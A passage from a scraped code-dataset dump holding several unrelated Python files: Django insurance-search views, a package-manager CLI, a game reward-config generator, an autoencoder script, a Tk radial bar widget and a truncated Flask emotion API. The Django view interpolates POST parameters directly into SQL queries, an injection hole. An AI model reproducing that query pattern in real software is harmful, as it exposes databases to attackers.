search_services(request):\n if request.method == \"POST\":\n search_text = request.POST['search_text']\n else:\n search_text = \"\"\n \n services = Service.objects.filter(name__icontains=search_text)\n \n return render (request, 'ajax_search.html', {'services':services})\n\n\ndef ajax_view(request):\n cursor = connection.cursor()\n command = \"\"\" select sk_name from ensurance_polis\"\"\"\n cursor.execute(command)\n sk_names = cursor.fetchall()\n sk_names_filtred = []\n for i in sk_names: #заполняем поле с названиями СК\n target = str(i[0]).lstrip(\"('\").rstrip(\"',)\")\n if target in sk_names_filtred: pass\n else: sk_names_filtred.append(target)\n if request.method==\"POST\": #валидность формы сделана в js\n polis_id = request.POST['polis_id'] #\n #inp_value = request.POST.get('chosenQuestions', 'This is a default value') #получаем из ajax, в хтмл это скрытая форма\n #print(polis_id, inp_value)\n cursor = connection.cursor()\n command = \"\"\" select * from ensurance_polis where id = '%s'\"\"\" %(polis_id) #получаем кортеж в списке в котором все ��анные из БД по айди полиса[( , , , )]\n cursor.execute(command)\n result = cursor.fetchall()\n in_services = result[0][5].split() #сервисы включенные в этот полис_ид\n out_services = result[0][6].split() #сервисы невключенные в этот полис_ид\n inp_value = request.POST.get('chosenQuestions', 'This is a default value') # получаем сервисы, которые выбраны\n print('inp', inp_value)\n inp_value_list = []# складируется все, что написано в поиске услуг\n if inp_value != '':\n inp_value = tuple(inp_value.split(',')) # в переменной лежат названия услуг, форматируем их чтобы узнать айди\n if len(inp_value) == 1: #чистим, если одно значение в кортеже, чтобы не было лишних символов\n inp_value = str(inp_value)\n inp_value = inp_value.replace(',','')\n print(inp_value)\n inp_value_list.append(inp_value.lstrip(\"('\").rstrip(\"',)\"))#ненавижу запятые\n elif len(inp_value) > 1:\n for elem in inp_value:\n print(elem)\n inp_value_list.append(elem)\n #тут тоже чистим - просто добвляем в лист\n\n command2 = \"\"\" select id, name from ensurance_service where name in 
{}\"\"\".format(inp_value) # получаем айди выбранных сервисов\n cursor.execute(command2)\n services_included = cursor.fetchall() # получаем [(id, name), (id, name), ...]\n print(inp_value_list, '0')\n services_chosen_ids = [] #сюда получаем [[id, name], [id, name], ...]\n services_included_html = []# все услуги которые включ, передаем в рендер\n services_excluded_html = []# все услуги которые выключ, передаем в рендер\n #services_unknown_html=[]# все что осталось, передаем в рендер\n for elem in services_included: # чистим айди и название услуги от лишних знаков\n local_dict = [elem[0], elem[1]]\n services_chosen_ids.append(local_dict) \n\n for j in services_chosen_ids: \n if j[1] in inp_value_list: #если есть совпадения из БД они удаляются, остается только то, чего нет в БД\n inp_value_list.pop(inp_value_list.index(j[1]))\n else:pass\n for i in services_chosen_ids: # проверяем на вхождение в ин_сервисес и выводим в штмл\n service_id = str(i[0])\n try: #делим услуги на включ/ не включ\n in_services.index(service_id)\n services_included_html.append(i[1])\n print(i[1], 'Включено')\n except:\n services_excluded_html.append(i[1])\n print(i[1], 'Не включено')\n print(inp_value_list, services_included_html, services_excluded_html)\n return render(request, 'polis_search.html', {'result':result, 'inp_value_list':inp_value_list, \"sk_names_filtred\":sk_names_filtred,'services_included_html':services_included_html, 'services_excluded_html':services_excluded_html})\n else:\n error_text_1 = 'Проверьте выбранные услуги и попробуйте заново'\n return render(request, 'polis_search.html', {'error_text_1':error_text_1, 'sk_names_filtred':sk_names_filtred})\n","repo_name":"jorjorjor1/med","sub_path":"project/apps/ensurance/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4084365431","text":"import os\nimport sys\nimport typing\nimport subprocess\nfrom pathlib import Path\nimport argparse\nimport shutil\nimport argcomplete\nfrom psprint import print\nfrom . 
import CONFIG\nfrom .config import MetaConfig\nfrom .classes import InstallEnv\nfrom .tools import timeout\n\n\ndef cli(config: MetaConfig = None) -> argparse.ArgumentParser:\n '''\n Parse command line arguments\n\n Args:\n config: configuration to be modified by command line inputs\n\n Returns:\n modified ``confing``\n\n '''\n config = config or CONFIG\n description = '''\n\n \\033[1;91mNOTICE: This is only intended for \"user\" packages.\n CAUTION: DO NOT RUN THIS SCRIPT AS ROOT.\n CAUTION: If you still insist, I won't care.\\033[m\n '''\n\n\n d_pref = config.data_dir\n parser = argparse.ArgumentParser(\n description=description,\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n # base arguments\n parser.add_argument('--init', action='store_true',\n help='Initialize PSPMan')\n parser.add_argument('--version', action='store_true',\n help='Display version and exit')\n parser.add_argument('-l', '--list', action='store_true', dest='info',\n help='display list of cloned repositories and exit')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='display verbose output')\n parser.add_argument('-s', '--stale', action='store_true',\n help='skip updates, let repositories remain stale')\n parser.add_argument('-o', '--only-pull', action='store_true', dest='pull',\n help='only pull, do not try to install')\n parser.add_argument('-f', '--force-risk', action='store_true', dest='risk',\n help='force working with root permissions [DANGEROUS]')\n parser.add_argument('-p', '--prefix', type=str, nargs='?', metavar='PREF',\n help=f'path for installation [default: {d_pref}]',\n default=d_pref)\n parser.add_argument('-c', '--clone-dir', type=str, nargs='?', default=None,\n metavar='C_DIR', help=f'''Clone git repos in C_DIR.\nPlease check if you want to add this to PATH.\n[default: PREF{os.sep}src]\n''')\n parser.add_argument('-r', '--reset', metavar='PROJ', type=str, nargs='*',\n default=[], help='clean-reset PROJ code')\n parser.add_argument('-d', '--delete', metavar='PROJ', type=str, nargs='*',\n default=[], help='delete PROJ')\n parser.add_argument('-i', '--install', metavar='URL', type=str, nargs='*',\n default=[],\n help=f'''\nformat: \"URL[___branch[___'only'|___inst_argv[___sh_env]]]\"\n\n* *REMEMBER the QUOTATION MARKS*\n\n* URL: url to be cloned.\n* branch: custom branch to clone. Blank implies default.\n* pull_only: 'true', 'only', 'pull', 'hold' => Don't try to install this URL\n* inst_argv: Custom arguments. These are passed *raw* during installation.\n* sh_env: VAR1=VAL1,VAR2=VAL2,VAR3=VAL3.... 
Modified install environment.\n\n''')\n parser.set_defaults(call_function=None)\n\n # sub-commands\n sub_parsers = parser.add_subparsers()\n\n version = sub_parsers.add_parser(name='version', aliases=['ver'],\n help='display version and exit')\n version.set_defaults(call_function='version')\n\n switch = sub_parsers.add_parser(\n name='switch', aliases=['activate', 'export'],\n help='switch to environment temporarily\\n' +\n 'with additional *PATH variables from PREFIX')\n switch.add_argument('switch_to', type=str, metavar='GIT_GROUP|PATH',\n help=\"GIT_GROUP's name or path\", nargs='?',\n default='default')\n switch.add_argument('-c', '--copy', action='store_true', dest='clipboard',\n help='try to copy soruce command to clipboard')\n switch.set_defaults(call_function='switch')\n\n unlock = sub_parsers.add_parser(name='unlock', aliases=[],\n help='Unlock C_DIR and exit')\n unlock.set_defaults(call_function='unlock')\n\n list_gits = sub_parsers.add_parser(\n name='list', aliases=['info'],\n help='display list of cloned repositories and exit'\n )\n list_gits.add_argument('--meta', '-m', action='store_true',\n help='List known C_DIR(s)')\n list_gits.set_defaults(call_function='info')\n\n init = sub_parsers.add_parser(name='init', aliases=['initialize'],\n help='initialize pspman')\n init.add_argument('--ignore', '-i', type=str, metavar='DEP', nargs='*',\n help='initialize without dependency DEP')\n init.set_defaults(call_function='init')\n\n goodbye = sub_parsers.add_parser(name='goodbye', aliases=['de-initialize'],\n help='Cleanup before uninstalling pspman')\n goodbye.set_defaults(call_function='goodbye')\n\n return parser\n\n\ndef cli_opts(config: MetaConfig = None) -> typing.Dict[str, typing.Any]:\n '''\n Parse cli arguments to return its dict\n '''\n config = config or CONFIG\n parser = cli()\n argcomplete.autocomplete(parser)\n args = parser.parse_args()\n if args.info:\n setattr(args, 'call_function', 'info')\n if hasattr(args, 'meta'):\n if args.meta:\n setattr(args, 'call_function', 'meta')\n else:\n setattr(args, 'call_function', 'info')\n if args.version:\n setattr(args, 'call_function', 'version')\n if args.init:\n setattr(args, 'call_function', 'init')\n return vars(args)\n\n\ndef perm_pass(env: InstallEnv, permdir: Path) -> int:\n '''\n Args:\n permdir: directory whose permissions are to be checked\n\n Returns:\n Error code: ``1`` if all rwx permissions are not granted\n\n '''\n if env.verbose:\n print(f'Checking permissions for {permdir}')\n while not permdir.exists():\n # clone/prefix directory get be created anew\n permdir = permdir.resolve().parent\n if env.verbose:\n print(f'Checking permissions for the parent: {permdir}')\n user = os.environ.get('USER', 'root')\n stdout, err = subprocess.Popen(['stat', '-L', '-c', \"%U %G %a\", permdir],\n text=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE).communicate()\n if err:\n print('Error checking directory permissions, aborting...', mark=5)\n return 1\n owner, group, octperm = stdout.replace(\"\\n\", '').split(' ')\n if (octperm[-1] == '7') != 0:\n # everyone has access\n return 0\n if (octperm[-2] == '7') != 0:\n # some group has permissions\n stdout, err = subprocess.Popen(['groups', user], text=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE).communicate()\n if err:\n # error\n print('Error checking group permissions, aborting...', mark=5)\n return 1\n user_groups = stdout.split(' ')\n for u_grp in user_groups:\n if u_grp == group:\n return 0\n if (octperm[-3] == '7') != 0:\n # owner has permissions\n if user == 
owner:\n return 0\n print(f'''\n We [{user}] do not have sufficient permissions [{octperm}]\n on {owner}'s directory: {permdir}\n ''', mark=5)\n print('Try another location', mark=2)\n return 1\n\n\ndef prepare_env(env: InstallEnv) -> int:\n '''\n Check permissions and create prefix and source directories\n\n Returns:\n Error code\n '''\n # Am I root?\n if os.environ.get('USER', 'root').lower() == 'root':\n print('I hate dictators', mark=3)\n if not env.risk:\n print('Bye', mark=0)\n return 2\n print('I can only hope you know what you are doing...',\n mark=3)\n print('Here is a chance to kill me in', mark=2)\n try:\n timeout(10)\n except:\n print(\"Aborting.\", pref_color='g', pref=chr(0x1f197), short=False)\n return 1\n print()\n print(\"Your decision\", pref=chr(0x1f937), pref_color='r',\n text_color=\"y\", short=False)\n print()\n print('Proceeding...', mark=1)\n else:\n # Is installation directory read/writable\n err = perm_pass(env=env, permdir=env.clone_dir)\n err += perm_pass(env=env, permdir=env.prefix)\n if err != 0:\n print('Bye', mark=0)\n return err\n env.clone_dir.mkdir(parents=True, exist_ok=True)\n env.prefix.mkdir(parents=True, exist_ok=True)\n return 0\n\n\ndef lock(env: InstallEnv, unlock: bool = False, message: str = None):\n '''\n Unlock up the directory\n\n Args:\n env: installation context\n unlock: unlock existing locks?\n message: message to be written in the lockfile instead of pid\n\n Returns:\n Error code\n\n '''\n lock_path = env.prefix.joinpath('.proc.lock')\n # lockfile is deliberately human-readable\n\n if lock_path.exists():\n # directory is locked\n if unlock:\n # restore all backup databases\n for filetype in \"healthy\", \"fail\":\n backup_file = env.clone_dir.joinpath(f\".pspman.{filetype}.yml\")\n if backup_file.with_suffix('.yml.bak').is_file() and \\\n not backup_file.is_file():\n backup_file.with_suffix(\".yml.bak\").replace(backup_file)\n temp_build = env.prefix.joinpath('temp_build')\n if temp_build.is_dir():\n shutil.rmtree(temp_build)\n lock_path.unlink()\n return 1\n with open(lock_path, 'r') as lock_fh:\n print(f\"This git-group was locked for safety by {lock_fh.read()}\",\n mark='err')\n print(\"Either wait for the process to get completed\")\n print(\"OR interrupt the process and execute\")\n print(f\"pspman -p {env.prefix} unlock\", mark='act')\n print(\"Interruption WILL generally MESS UP source codes.\", mark='warn')\n return 2\n if unlock:\n print(f'Lockfile {lock_path} not found.')\n return 2\n with open(lock_path, 'w') as lock_fh:\n lock_fh.write(str(message) or 'pid:' + str(os.getpid()))\n return 0\n","repo_name":"pradyparanjpe/pspman","sub_path":"pspman/define.py","file_name":"define.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8373586571","text":"indexnum = 0\n\ncommon = int(input('Common: '))\nuncommon = int(input('Uncommon: '))\nrare = int(input('Rare: '))\nveryrare = int(input('VeryRare: '))\nextremelyrare = int(input('ExtremelyRare: '))\nlegendary = int(input('Legendary: '))\n\ncommonpokes = []\nuncommonpokes = []\nrarepokes = []\nveryrarepokes = []\nextremelyrarepokes = []\nlegendarypokes = []\nrarities = [6000, 5000, 4000, 3000, 2000, 1000]\n\nif common != 0:\n print('Common')\n commonchance = round(rarities[0] / common)\n for i in range(common):\n commonpokes.append(input())\nif uncommon != 0:\n print('Uncommon')\n uncommonchance = round(rarities[1] / uncommon)\n for i in range(uncommon):\n 
uncommonpokes.append(input())\nif rare != 0:\n print('Rare')\n rarechance = round(rarities[2] / rare)\n for i in range(rare):\n rarepokes.append(input())\nif veryrare != 0:\n print('Very Rare')\n veryrarechance = round(rarities[3] / veryrare)\n for i in range(veryrare):\n veryrarepokes.append(input())\nif extremelyrare != 0:\n print('Extremely')\n extremelyrarechance = round(rarities[4] / extremelyrare)\n for i in range(extremelyrare):\n extremelyrarepokes.append(input())\nif legendary != 0:\n print('Legendary')\n legendarychance = round(rarities[5] / legendary)\n for i in range(legendary):\n legendarypokes.append(input())\n\n\ndef pencil(chance, poke, len):\n global indexnum\n if True:\n for k in range(len):\n print(f' \"{indexnum}\"', '{')\n print(f'\t\t\t\tchance={chance}')\n print(f' reward=\"ITEM:pixelmon:{poke[k]}:0:1\"')\n print(' }')\n indexnum += 1\n\n\nif common != 0:\n print('#Common')\n pencil(commonchance, commonpokes, common)\nif uncommon != 0:\n print('#Uncommon')\n pencil(uncommonchance, uncommonpokes, uncommon)\nif rare != 0:\n print('#Rare')\n pencil(rarechance, rarepokes, rare)\nif veryrare != 0:\n print('#Veryrare')\n pencil(veryrarechance, veryrarepokes, veryrare)\nif extremelyrare != 0:\n print('#Extremelyrare')\n pencil(extremelyrarechance, extremelyrarepokes, extremelyrare)\nif legendary != 0:\n print('#Legendary')\n pencil(legendarychance, legendarypokes, legendary)\n","repo_name":"Ti1mmy/RC-Automation-Scripts","sub_path":"Congiftms.py","file_name":"Congiftms.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73529577427","text":"#!/usr/bin/env python\n\"\"\"\nMain file for Tutorial 4 Part 3.1\nUses an auto-encoder (Autoencoder class) for different experiments\n\nAuthors: Kostis SZ, Romina Arriaza and Clara Tump\n\"\"\"\n\nimport numpy as np\nimport data\nimport plot\nfrom auto_encoder import Autoencoder\n\nnp.random.seed(10)\n\ndef main():\n x_train, y_train, x_test, y_test = data.mnist()\n layer_sizes = [10,100,400,784,900,1000]\n sigmoid_histories = []\n relu_histories = []\n for layer_size in layer_sizes:\n print(\"layer_size: \", layer_size)\n sigm_1run = train(layer_size, 'sigmoid', x_train, x_test)\n relu_1run = train(layer_size, 'relu', x_train, x_test)\n sigmoid_histories.append(sigm_1run)\n relu_histories.append(relu_1run)\n print(\"MSE sigmoid: \", sigm_1run)\n print(\"MSE relu: \", relu_1run)\n print(\"sigmoid histories: \", sigmoid_histories)\n print(\"relu histories: \", relu_histories)\n plot.plot_losses(layer_sizes, sigmoid_histories, relu_histories)\n\ndef train(layer_size, activation, x_train, x_test):\n params = {\n \"epochs\" : 35,\n \"num_hid_nodes\": layer_size,\n \"weight_init\": [0.0, 0.1],\n \"activations\": activation, #relu is much better performance\n \"lr\": 0.15,\n \"verbose\": 0\n }\n auto_enc1 = Autoencoder(**params)\n if layer_size > 784:\n regularization = 0.0001\n else:\n regularization = 0\n history = auto_enc1.train(x_train,x_train, x_test, regularization=regularization)\n # loss = auto_enc1.evaluate(x_test)\n # print(\"history: \", history.history['loss'])\n return history.history['loss']\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"clara2911/ANNProject","sub_path":"Tutorial 4/main_31_relu.py","file_name":"main_31_relu.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"75036541584","text":"try:\n import 
Tkinter as tk\nexcept ModuleNotFoundError:\n import tkinter as tk\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageTk\nimport sys\nimport math\n\nclass RadialBar(object):\n\n def __init__(self, size=(50,50), width=4, padding=1, title=None, units=None, imgtype='P',\n barcol=0, valuecol=1, fillcol=2, bgcol = 1, outlinecol=1, emptycol=2, titlecol=1,\n font = 'FreeSans.ttf', fontsize=12, antialias=False):\n self._size = (size[0]-1, size[1]-1) # use size as min and max pixel extents\n self.title = title\n self.unit = units\n self.bar_width = width\n self.padding = padding\n self._bar = barcol\n self._text = valuecol\n self._titlecol = titlecol\n self._fill = fillcol\n self._background = bgcol\n self._outline = outlinecol\n self._nobar = emptycol\n self._imgtype = imgtype \n self._isint = True\n self._val = 0.0\n self._minval = 0.0\n self._maxval = 100.0\n self._precision = 1\n self._squareindicator = True\n self._antialias = antialias\n\n self._img = Image.new(imgtype, size)\n self._draw = ImageDraw.Draw(self._img)\n self.set_font(font, fontsize)\n\t\t\n\t\t# Values to support click events for window managers\n self._centre = (self._size[0]/2,self._size[1]/2)\n self._outer_radius = self._centre\n self._inner_radius = ((self._outer_radius[0] - self.bar_width), (self._outer_radius[1] - self.bar_width))\n\n @property\n def bar_col(self):\n return self._bar\n\n @bar_col.setter\n def bar_col(self,val):\n self._bar = val\n\n @property\n def empty_col(self):\n return self._nobar\n\n @empty_col.setter\n def empty_col(self,val):\n self._nobar = val\n\n @property\n def value_col(self):\n return self._text\n\n @value_col.setter\n def value_col(self,val):\n self._text = val\n\n @property\n def title_col(self):\n return self._titlecol\n\n @title_col.setter\n def title_col(self,val):\n self._titlecol = val\n\n @property\n def fill_col(self):\n return self._fill\n\n @fill_col.setter\n def fill_col(self,val):\n self._fill = val\n\n @property\n def background_col(self):\n return self._background\n\n @background_col.setter\n def background_col(self,val):\n self._background = val\n\n @property\n def outline_col(self):\n return self._outline\n\n @outline_col.setter\n def outline_col(self,val):\n self._outline = val\n \n @property\n def size(self):\n return self._img.size\n\n def set_font(self, fontname, size):\n try:\n self._font = ImageFont.truetype(fontname, size)\n except IOError:\n pass\n \n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, title):\n if title == '':\n self._title = None\n self._title = title\n\n @property\n def unit(self):\n return self._units\n\n @unit.setter\n def unit(self, units):\n if units is None:\n self._units = ''\n else:\n self._units = units\n\n @property\n def bar_width(self):\n return self._width\n\n @bar_width.setter\n def bar_width(self, width):\n if not isinstance(width, int):\n raise TypeError(\"Width must be an integer\")\n if width < 0:\n raise ValueError(\"Width must be a positive value\")\n self._width = width\n\t\t\n @property\n def padding(self):\n return self._padding\n\n @padding.setter\n def padding(self, pad):\n if not isinstance(pad, int):\n raise TypeError(\"Padding must be an integer\")\n if pad < 0:\n raise ValueError(\"Padding must be a positive value\")\n self._padding = pad\n\n @property\n def value(self):\n return self._val\n\n @value.setter\n def value(self, val):\n self._isint = isinstance(val, int)\n self._val = float(val)\n\n @property\n def precision(self):\n return self._precision\n\n @precision.setter\n def 
precision(self, points):\n if points < 0:\n raise ValueError(\"Precision must be a positive integer\")\n self._precision = points\n\n def square_indicator(self):\n self._squareindicator = True\n\n def scalable_indicator(self):\n self._squareindicator = False\n \n def set_range(self, minval, maxval):\n if minval > maxval:\n raise ValueError(\"Min value greater than Max value\")\n\n self._minval = float(minval)\n self._maxval = float(maxval)\n\n def define_bounding_area(self):\n # Render title text if a title has been defined\n titleheight = 0\n if not self._title is None:\n w, h = self._font.getsize(self._title)\n titleheight = h + 1 # Add 1px border\n\n x_top = 0\n y_top = titleheight\n x_bottom = self._size[0]\n y_bottom = self._size[1]\n if self._squareindicator:\n # even the sides to appear circular and central\n # Which is the shortest side?\n width = (x_bottom - x_top)\n height = (y_bottom - y_top)\n if width > height: \n # Scale width\n x_top = int(x_top + ((width - height) / 2))\n x_bottom = int(x_bottom - ((width - height) / 2))\n elif height > width:\n # Scale height\n y_top = int(y_top + ((height - width) / 2))\n y_bottom = int(y_bottom - ((height - width) / 2))\n #else they are the same and do nothing\n\n # Add padding\n x_top = x_top + self._padding\n y_top = y_top + self._padding\n x_bottom = x_bottom - self._padding\n y_bottom = y_bottom - self._padding\n self._outer_radius = ((x_bottom - x_top) / 2, (y_bottom - y_top) / 2)\n self._inner_radius = ((self._outer_radius[0] - self.bar_width), (self._outer_radius[1] - self.bar_width))\n return ((x_top,y_top),(x_bottom,y_bottom))\n\n def rendergraph(self, bounds):\n rng = self._maxval - self._minval\n degree = 0\n if (self._val <= self._minval): degree = 0\n elif (self._val >= self._maxval): degree = 360\n else:\n degree = ((self._val - self._minval) * 360) / rng\n\n degree_end = int(degree - 90)\n if degree_end < 0:\n degree_end = 270 + degree\n\n (cw,ch) = (bounds[1][0] - bounds[0][0], bounds[1][1] - bounds[0][1])\n self._centre = ((bounds[0][0]+(cw/2)), (bounds[0][1]+(ch/2))) # Save this for window event detection\n if self._antialias: \n (cw,ch) = (cw*2,ch*2)\n ctlimg = Image.new(self._imgtype, (cw,ch), color=self._background)\n ctldraw = ImageDraw.Draw(ctlimg)\n ctlextents = (ctlimg.width-1, ctlimg.height-1)\n\n # Exception, if zero degrees then skip rendering the bar\n if degree == 0:\n ctldraw.ellipse( ((0,0),ctlextents), fill=self._nobar)\n else: # Render the progress bar\n ctldraw.ellipse( ((0,0), ctlextents), fill=self._bar)\n if not degree == 360:\n # Overwrite the indicator with a pie slice unless it's totally full\n ctldraw.pieslice( ((0,0), ctlextents), degree_end, 270, self._nobar)\n\n # Draw internal ellipse\n barwidth = self._width\n if self._antialias: barwidth = self._width * 2\n ctldraw.ellipse(((barwidth,barwidth),\n (ctlimg.width-barwidth, ctlimg.height-barwidth)),\n fill=self._fill, outline=self._outline)\n\n # Draw final border around external ellipse\n ctldraw.ellipse( ((0,0), ctlextents), fill=None, outline=self._outline)\n\t\t\n # paste image back to main control\n if self._antialias:\n ctlimg = ctlimg.resize((int(ctlimg.width/2), int(ctlimg.height/2)), Image.LANCZOS)\n self._img.paste(ctlimg, (bounds[0][0], bounds[0][1]))\n\t\n def rendertitle(self):\n # render the title text\n if self._title is not None:\n w, h = self._font.getsize(self._title)\n xtxt = int((self._size[0] - w) / 2)\n self._draw.text( (xtxt,0), self._title, fill=self._titlecol, font=self._font)\n\n def rendervalue(self,bounds):\n # 
Format number as integer or floating point according to defined precision\n txtformat = '{0:.0f}{1}'\n if not self._isint:\n txtformat = '{0:.' + \"{0:d}\".format(self._precision) + 'f}{1}'\n\n # Encode/decode UTF8 dance (needed for such things as degree symbols)\n if sys.version_info[0] < 3:\n txt = txtformat.format(self._val, self._units.encode('utf-8')).decode('utf-8')\n else:\n txt = txtformat.format(self._val, self._units)\n w, h = self._font.getsize(txt)\n\n # render text centrally\n x = bounds[0][0] + (((bounds[1][0] - bounds[0][0]) - w) /2)\n y = bounds[0][1] + (((bounds[1][1] - bounds[0][1]) - h) /2)\n \n self._draw.text( (x,y), txt, fill=self._text, font=self._font) \n\n def render(self):\n 'Render and return a PIL image'\n # Clear background for entire image\n self._draw.rectangle(((0,0),self._size), fill=self._background)\n \n\t\t# Define the drawing area for the control without title and considering\n\t\t# options to maintain aspect\n bounds = self.define_bounding_area()\n\t\t\n\t\t# Draw the radial bar image\n self.rendergraph(bounds)\n\n\t\t# Draw title text\n self.rendertitle()\n\t\t\n\t\t# Draw value and any specified label\n self.rendervalue(bounds)\n\n # Return the rendered image\n return self._img\n \nclass TkRadialBar(tk.Label, RadialBar):\n\tClickStatus = 1\n\tClickProgress = 2\n\tClickBackground = 3\n\t\n\tdef __init__(self, master):\n\t\t# Setup as a full colour control and define default colours to use\n\t\tRadialBar.__init__(self, size=(150,150), font=\"arial.ttf\", fontsize=12, imgtype='RGB', antialias=True)\n\t\ttk.Label.__init__(self, master, bg=\"white\")\n\t\tself.bar_width = 20\n\t\tself.bar_col = (255,0,0)\n\t\tself.empty_col = (255,255,255)\n\t\tself.background_col = (255,255,255)\n\t\tself.outline_col = (0,0,0)\n\t\tself.value_col = (0,0,0)\n\t\tself.title_col = (0,0,0)\n\t\tself.fill_col = (200,200,200)\n\t\tself.set_range(15,40)\n\t\t\n\t\tself.bind(\"\", self.activateclick)\n\t\tself.bind(\"\", self.activateclick)\n\t\tself.bind(\"\", self.activateclick)\n\t\tself.bind(\"\", self.activateclick)\n\t\t\n\t\tself._lastclick = (TkRadialBar.ClickStatus, tk.EventType.ButtonRelease)\n\t\t\n\tdef on_click_status(self, event):\n\t\tpass\n\t\t\n\tdef on_click_progress(self, event):\n\t\tpass\n\t\t\n\tdef activateclick(self, event):\n\t\txdis = self._centre[0] - event.x\n\t\tydis = self._centre[1] - event.y\n\n\t\tlastclick = (TkRadialBar.ClickBackground, event.type)\n\t\t\n\t\ttest = ( math.pow(event.x - self._centre[0],2) / math.pow(self._inner_radius[0],2) ) \\\n\t\t\t+ ( math.pow(event.y - self._centre[1],2) / math.pow(self._inner_radius[1],2) )\n\t\t\t\t\n\t\tif test <= 1:\n\t\t\tif self._lastclick[0] == TkRadialBar.ClickStatus and self._lastclick[1] == tk.EventType.ButtonPress and event.type == tk.EventType.ButtonRelease:\n\t\t\t\tself.on_click_status(event)\n\t\t\tlastclick = (TkRadialBar.ClickStatus, event.type)\n\t\telse:\n\t\t\ttest2 = ( math.pow(event.x - self._centre[0],2) / math.pow(self._outer_radius[0],2) ) \\\n\t\t\t\t+ ( math.pow(event.y - self._centre[1],2) / math.pow(self._outer_radius[1],2) )\n\t\t\tif test > 1 and test2 <= 1:\n\t\t\t\tif self._lastclick[0] == TkRadialBar.ClickProgress and self._lastclick[1] == tk.EventType.ButtonPress and event.type == tk.EventType.ButtonRelease:\n\t\t\t\t\tself.on_click_progress(event)\n\t\t\t\tlastclick = (TkRadialBar.ClickProgress, event.type)\n\t\t\t\t\n\t\tself._lastclick = lastclick\n\t\n\tdef render(self):\n\t\t'Render a Tk Photo Image'\n\t\t# hold a reference to the image in the class otherwise\n\t\t# 
the photo image will be lost\n\t\tself.image = ImageTk.PhotoImage(RadialBar.render(self))\n\t\tself.configure(image=self.image)","repo_name":"AidanHolmes/pil-widget","sub_path":"radialbar.py","file_name":"radialbar.py","file_ext":"py","file_size_in_byte":12029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29304917732","text":"'''\nThis module contains the ScalarTypeSymbol which represents scalar types\nin the Particle_IR tree.\n'''\nfrom HartreeParticleDSL.Particle_IR.symbols.symbol import Symbol\nfrom HartreeParticleDSL.Particle_IR.datatypes.datatype import ScalarType\n\nclass ScalarTypeSymbol(Symbol):\n '''\n Class for symbols to a ScalarType.\n\n :param str name: name of the symbol.\n :param datatype: datatype of the symbol.\n :type datatype: :py:class:`HartreeParticleDSL.Particle_IR.datatypes.datatype.ScalarType`\n :param kwargs: additional arguments provided by the Symbol base class.\n :type kwargs: unwrapped dict.\n '''\n\n def __init__(self, name: str, datatype : ScalarType, **kwargs):\n self._datatype = None\n super().__init__(name, **kwargs)\n self.datatype = datatype\n\n @property\n def datatype(self) -> ScalarType:\n '''\n :returns: datatype of the TypedSymbol.\n :rtype: :py:class:`HartreeParticleDSL.Particle_IR.datatypes.datatype.ScalarType`\n '''\n return self._datatype\n\n @datatype.setter\n def datatype(self, value: ScalarType) -> None:\n '''\n Setter for the datattype of a Typedsymbol.\n\n :param value: new value for the datatype.\n :type value: :py:class:`HartreeParticleDSL.Particle_IR.datatypes.datatype.ScalarType`\n\n :raises TypeError: if the value is not of the correct type.\n '''\n if not isinstance(value, ScalarType):\n raise TypeError(\n f\"The datatype of a {type(self)} must be specified \"\n f\"using a ScalarType but got {type(value)}.\")\n self._datatype = value\n","repo_name":"stfc/HartreeParticleDSL","sub_path":"src/HartreeParticleDSL/Particle_IR/symbols/scalartypesymbol.py","file_name":"scalartypesymbol.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71493930705","text":"#Global import\nfrom flask import Flask, request, Response\nimport jsonpickle\nimport numpy as np\nimport cv2\nimport base64\nfrom PIL import Image, ImageOps\nfrom io import BytesIO\nimport sys\n#local imports\nimport process\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n_all_emotions = {0:'angry', 1:'disgust', 2:'fear', 3:'happy', 4:'sad', 5:'surprise', 6:'neutral'}\n\n\ndef select_emotions(emotions):\n indexes = []\n for key, value in _all_emotions.items():\n if value in emotions: indexes.append(key)\n return indexes\n\n\n# route http posts to this method\n@app.route('/api/test', methods=['POST'])\ndef test():\n '''\n Main function that gets envoked when receiving a request.\n \n Simply, takes json 64base decoded images, and set of desired emotions.\n\n Decode these data, send each frame to be processed, accumelate and average results.\n\n Then send a response with these values.\n '''\n r = request\n # Decode and extract data/emotion set.\n data = jsonpickle.decode(r.data)\n frmaes = data['data']\n emotions = data['emotions']\n # Select the desired indexes\n if len(emotions) <= 0:\n print (\"Error: No emotions selected.\")\n sys.exit(0)\n\n emotion_indexes = select_emotions(emotions)\n # Accumulate results here.\n result = []\n\n for key, value in frmaes.items():\n print (f'this is frame {key}')\n # 
